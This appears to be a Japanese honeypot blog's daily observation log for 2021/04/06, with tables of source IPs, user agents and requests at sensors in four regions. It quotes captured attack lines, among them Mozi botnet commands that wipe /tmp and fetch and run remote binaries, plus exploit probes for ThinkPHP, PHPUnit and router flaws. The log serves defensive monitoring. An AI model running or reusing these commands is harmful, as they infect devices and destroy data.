ハニーポット(仮) 観測記録 2021/04/06分です。
特徴
共通
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為
Location:JP
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//178[.]175[.]17[.]75:45626/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
cd /tmp; rm -rf *; wget http[:]//27[.]41[.]5[.]128:60348/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:US
Apache Tomcatへのスキャン行為
WordPressへのスキャン行為
110[.]242[.]68[.]4に関する不正通信
UserAgentがHello, Worldであるアクセス
を確認しました。
Location:UK
NetGear製品の脆弱性を狙うアクセス
/.envへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:SG
NetGear製品の脆弱性を狙うアクセス
ZmEuによるスキャン行為
/.envへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
WordPressへのスキャン行為
110[.]242[.]68[.]4に関する不正通信
112[.]124[.]42[.]80に関する不正通信
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//58[.]253[.]8[.]32:56495/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
他
アクセス数推移
JP:総アクセス数:48 (前日比:-59)
US:総アクセス数:78 (前日比:+21)
UK:総アクセス数:33 (前日比:-132)
SG:総アクセス数:76 (前日比:+16)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 3.94.20.255 | United States |
1 | 3.237.0.246 | United States |
1 | 13.233.4.112 | United States |
3 | 23.98.154.25 | United States |
1 | 27.41.5.128 | China |
1 | 39.107.245.131 | China |
1 | 40.79.57.64 | United States |
1 | 45.80.153.160 | Germany |
11 | 45.155.205.151 | Russia |
1 | 45.229.54.248 | Brazil |
1 | 47.241.122.153 | United States |
1 | 54.172.81.86 | United States |
1 | 79.26.158.174 | Italy |
1 | 84.38.132.44 | Belize |
1 | 98.189.198.168 | United States |
1 | 117.201.205.161 | India |
1 | 118.239.23.35 | China |
1 | 139.28.38.209 | Ukraine |
1 | 143.198.56.16 | United States |
1 | 150.136.75.66 | United States |
1 | 157.245.143.43 | United States |
1 | 163.172.68.26 | United Kingdom |
1 | 178.175.17.75 | Albania |
1 | 182.121.205.92 | China |
1 | 185.100.87.136 | Seychelles |
7 | 193.169.255.95 | Poland |
3 | 205.185.122.102 | United States |
1 | 207.246.123.227 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
6 | - |
1 | Hello, World |
2 | Hello, world |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0 |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 |
7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
11 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
3 | Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 |
2 | python-requests/2.18.4 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | \x16\x03\x01 | ||
12 | GET | /.env | HTTP/1.1 |
1 | GET | /.git | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
2 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=ec8&psd=ec8 | HTTP/1.0 |
3 | GET | /config/getuser?index=0 | HTTP/1.1 |
1 | GET | /console/ | HTTP/1.1 |
1 | GET | /dump.sql | HTTP/1.1 |
1 | GET | /etc/passwd | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
2 | GET | /myjsp.jsp | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//178[.]175[.]17[.]75:45626/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//27[.]41[.]5[.]128:60348/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
1 | GET | http[:]//passport[.]baidu[.]com/ | HTTP/1.1 |
1 | HEAD | / | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
2 | POST | /HNAP1/ | HTTP/1.0 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /index.htm | HTTP/1.1 |
2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
4 | PUT | /myjsp.jsp/ | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 27.224.137.7 | China |
1 | 31.210.20.170 | Netherlands |
1 | 40.76.60.168 | United States |
22 | 45.155.205.151 | Russia |
1 | 58.97.201.45 | Cambodia |
1 | 60.13.138.58 | China |
1 | 60.208.208.218 | China |
1 | 61.52.72.45 | China |
1 | 61.52.83.198 | China |
1 | 89.248.174.173 | United Kingdom |
1 | 113.128.104.43 | China |
1 | 120.85.110.147 | China |
1 | 120.85.110.253 | China |
3 | 145.239.82.0 | France |
1 | 150.255.3.212 | China |
1 | 163.172.68.26 | United Kingdom |
7 | 167.99.215.170 | United States |
1 | 172.105.77.209 | United States |
1 | 175.184.164.194 | China |
1 | 178.175.93.115 | Albania |
2 | 178.238.8.230 | United Kingdom |
7 | 192.100.159.106 | Mexico |
7 | 201.116.250.2 | Mexico |
2 | 205.185.122.102 | United States |
3 | 207.7.120.154 | United States |
1 | 209.126.107.176 | United States |
7 | 218.104.225.148 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
6 | - |
1 | Hello, World |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
28 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0 |
5 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 |
22 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36 OPR/54.0.2952.51 |
5 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
1 | Mozilla/5.01724933 Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E302 |
4 | PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3 |
1 | User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
3 | \x16\x03\x01 | ||
1 | CONNECT | cn[.]bing[.]com/:443 | HTTP/1.1 |
1 | CONNECT | www[.]baidu[.]com/:443 | HTTP/1.1 |
1 | CONNECT | www[.]bing[.]com/:443 | HTTP/1.1 |
1 | CONNECT | www[.]so[.]com/:443 | HTTP/1.1 |
1 | CONNECT | www[.]voanews[.]com/:443 | HTTP/1.1 |
6 | GET | /.env | HTTP/1.1 |
2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
2 | GET | /?a=fetch&content= |
HTTP/1.1 |
4 | GET | /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=__HelloThinkPHP | HTTP/1.1 |
2 | GET | /_ignition/execute-solution | HTTP/1.1 |
2 | GET | /config/getuser?index=0 | HTTP/1.1 |
2 | GET | /console/ | HTTP/1.1 |
2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
4 | GET | /jenkins/login | HTTP/1.1 |
4 | GET | /login | HTTP/1.1 |
5 | GET | /manager/html | HTTP/1.1 |
2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
2 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
4 | GET | /wp-login.php | HTTP/1.1 |
1 | GET | http[:]//dongtaiwang[.]com/ | HTTP/1.1 |
1 | GET | http[:]//www[.]bing[.]com/ | HTTP/1.1 |
1 | GET | http[:]//www[.]minghui[.]org/ | HTTP/1.1 |
1 | GET | http[:]//www[.]rfa[.]org/english/ | HTTP/1.1 |
1 | GET | http[:]//www[.]soso[.]com/ | HTTP/1.1 |
1 | GET | http[:]//www[.]wujieliulan[.]com/ | HTTP/1.1 |
1 | HEAD | http[:]//110[.]242[.]68[.]4/ | HTTP/1.1 |
2 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
1 | POST | /HNAP1/ | HTTP/1.0 |
4 | POST | /_ignition/execute-solution | HTTP/1.1 |
2 | POST | /api/jsonws/invoke | HTTP/1.1 |
6 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | http[:]//impius[.]fun/fa12f2b318e5a114804cac9882f5d1d278ebe8226aa27ff517d21b64304a103f7967141c67424fbd3afba93d6eecb5b8d6a854d718a5ab8cd7bcd7e7fe535a00a6670097075349307d3c4318c7713ba6c4eb7b525a9a7f6dc250654bcbe24b3a | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
4 | 5.8.10.202 | Russia |
1 | 36.37.185.101 | Cambodia |
1 | 45.124.137.219 | Japan |
11 | 45.155.205.151 | Russia |
1 | 45.224.169.47 | Brazil |
1 | 103.217.123.252 | India |
4 | 104.224.29.59 | United States |
2 | 107.179.35.246 | United States |
1 | 112.237.141.241 | China |
1 | 120.85.99.100 | China |
1 | 176.107.177.161 | Ukraine |
1 | 182.112.30.19 | China |
1 | 185.202.2.65 | Russia |
1 | 197.136.174.162 | Kenya |
2 | 205.185.122.102 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
8 | - |
1 | Hello, World |
1 | Hello, world |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
7 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
1 | python-requests/2.18.4 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | \x03 | ||
2 | \x16\x03\x01 | ||
1 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ | HTTP/1.0 | |
4 | GET | /.env | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /aaa9 | HTTP/1.1 |
1 | GET | /aab9 | HTTP/1.1 |
1 | GET | /app/.env | HTTP/1.1 |
2 | GET | /config/getuser?index=0 | HTTP/1.1 |
1 | GET | /console/ | HTTP/1.1 |
1 | GET | /core/.env | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /public/.env | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//45[.]224[.]169[.]47:49104/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
1 | GET | http[:]//m[.]baidu[.]com/?r=_1498538301212398101517164 | HTTP/1.0 |
1 | GET | http[:]//www[.]ceek[.]jp/?r=_860017139210108501118592 | HTTP/1.0 |
1 | HEAD | / | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
1 | POST | /HNAP1/ | HTTP/1.0 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
2 | 13.64.179.88 | United States |
1 | 36.5.68.40 | China |
1 | 36.5.223.160 | China |
1 | 36.32.3.182 | China |
11 | 45.155.205.151 | Russia |
1 | 49.113.99.40 | China |
1 | 52.163.87.223 | United States |
1 | 58.253.8.32 | China |
1 | 60.191.125.35 | China |
1 | 69.162.231.196 | United States |
2 | 89.248.165.24 | United Kingdom |
1 | 101.132.72.213 | China |
4 | 104.36.167.69 | United States |
3 | 111.7.96.156 | China |
1 | 119.118.7.72 | China |
1 | 119.118.17.139 | China |
1 | 120.85.111.57 | China |
6 | 121.173.126.140 | South Korea |
1 | 123.160.173.129 | China |
1 | 123.160.235.58 | China |
7 | 138.68.176.190 | United States |
1 | 139.28.38.209 | Ukraine |
1 | 161.97.114.213 | Germany |
1 | 163.172.68.26 | United Kingdom |
3 | 163.172.161.118 | United Kingdom |
1 | 171.36.97.6 | China |
1 | 171.36.132.120 | China |
1 | 178.175.32.69 | Albania |
1 | 178.238.8.230 | United Kingdom |
4 | 180.252.54.190 | Indonesia |
7 | 182.18.165.73 | India |
1 | 183.27.123.97 | China |
1 | 185.202.2.65 | Russia |
1 | 205.185.122.102 | United States |
2 | 209.141.61.146 | United States |
1 | 213.163.115.12 | Albania |
UserAgent一覧
件数 | UserAgent |
---|---|
9 | - |
2 | Chrome/54.0 (Windows NT 10.0) |
1 | Hello, World |
1 | Hello, world |
6 | Mozilla/5.0 |
15 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 |
6 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
12 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
1 | Mozilla/5.01712517 Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 |
1 | Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 |
4 | PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3 |
2 | ZmEu |
1 | python-requests/2.18.4 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
3 | \x03 | ||
1 | \x16\x03 | ||
1 | \x16\x03\x01 | ||
1 | CONNECT | cn[.]bing[.]com/:443 | HTTP/1.1 |
1 | CONNECT | m[.]blog[.]naver[.]com:443 | HTTP/1.1 |
1 | CONNECT | m[.]blog[.]naver[.]com:80 | HTTP/1.1 |
1 | CONNECT | www[.]baidu[.]com/:443 | HTTP/1.1 |
1 | CONNECT | www[.]bing[.]com/:443 | HTTP/1.1 |
1 | CONNECT | www[.]coupang[.]com/:443 | HTTP/1.1 |
1 | CONNECT | www[.]coupang[.]com/:80 | HTTP/1.1 |
1 | CONNECT | www[.]so[.]com/:443 | HTTP/1.1 |
1 | CONNECT | www[.]voanews[.]com/:443 | HTTP/1.1 |
1 | CONNECT | www[.]youtube[.]com/:443 | HTTP/1.1 |
1 | CONNECT | www[.]youtube[.]com/:80 | HTTP/1.1 |
7 | GET | /.env | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
3 | GET | /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=__HelloThinkPHP | HTTP/1.1 |
1 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /app/.env | HTTP/1.1 |
1 | GET | /config/getuser?index=0 | HTTP/1.1 |
1 | GET | /console/ | HTTP/1.1 |
1 | GET | /core/.env | HTTP/1.1 |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
2 | GET | /jenkins/login | HTTP/1.1 |
2 | GET | /login | HTTP/1.1 |
2 | GET | /manager/html | HTTP/1.1 |
1 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
2 | GET | /public/.env | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//178[.]175[.]32[.]69:46282/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//58[.]253[.]8[.]32:56495/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /storage/.env | HTTP/1.1 |
1 | GET | /vendor/.env | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
2 | GET | /wp-login.php | HTTP/1.1 |
1 | GET | http[:]//dongtaiwang[.]com/ | HTTP/1.1 |
1 | GET | http[:]//www[.]bing[.]com/ | HTTP/1.1 |
1 | GET | http[:]//www[.]epochtimes[.]com/ | HTTP/1.1 |
1 | GET | http[:]//www[.]minghui[.]org/ | HTTP/1.1 |
1 | GET | http[:]//www[.]rfa[.]org/english/ | HTTP/1.1 |
1 | GET | http[:]//www[.]soso[.]com/ | HTTP/1.1 |
1 | GET | http[:]//www[.]wujieliulan[.]com/ | HTTP/1.1 |
3 | HEAD | / | HTTP/1.1 |
1 | HEAD | http[:]//110[.]242[.]68[.]4/ | HTTP/1.1 |
1 | HEAD | http[:]//112[.]124[.]42[.]80:63435/ | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
1 | POST | /HNAP1/ | HTTP/1.0 |
2 | POST | /_ignition/execute-solution | HTTP/1.1 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
3 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | http[:]//grzej[.]xyz/ff0261a6604249c93b4788e49f1effe2910de02a11ad21e153549795550db795a7c1ced398cead867cc08af6078a6683b1b729b7c5c1b8f0bdd8e74afeb1624d77a027f31c10b49eb19425c70e94c7e6c5e53991ffccf54c10cd151b03cd6916 | HTTP/1.1 |